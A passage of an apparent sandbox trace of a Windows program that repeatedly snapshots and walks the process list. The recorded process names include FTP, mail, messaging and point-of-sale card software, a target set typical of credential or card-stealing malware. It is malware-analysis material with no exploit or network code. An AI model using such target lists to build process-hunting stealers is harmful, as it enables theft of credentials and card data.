out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0230.021] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0230.022] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0230.023] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0230.025] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0230.112] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0230.114] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0230.115] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0230.116] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0230.118] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0230.122] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0230.124] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0230.125] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0230.127] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0230.128] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0230.130] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0230.131] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0230.132] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0230.134] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0230.136] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0230.140] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0230.142] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0230.143] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0230.145] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0230.147] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0230.148] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0230.150] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0230.236] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0230.238] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0230.240] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0230.242] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0230.244] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0230.248] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0230.250] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0230.252] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0230.253] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0230.255] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0230.256] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0230.259] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0230.263] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0230.265] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0230.267] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0230.268] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0230.270] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0230.271] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0230.273] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0230.274] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0230.328] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0230.330] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0230.331] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0230.333] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0230.335] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0230.336] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0230.338] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0230.342] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0230.344] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0230.345] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0230.347] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0230.348] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0230.349] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.351] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0230.352] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0230.357] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0230.358] CloseHandle (hObject=0xdc4) returned 1 [0230.358] Sleep (dwMilliseconds=0x64) [0230.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0230.479] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.480] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.485] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.486] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.488] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.489] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.491] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.492] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.494] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.500] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.502] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.506] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.508] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.509] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.540] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.552] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.554] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.556] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.557] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.559] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.560] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, 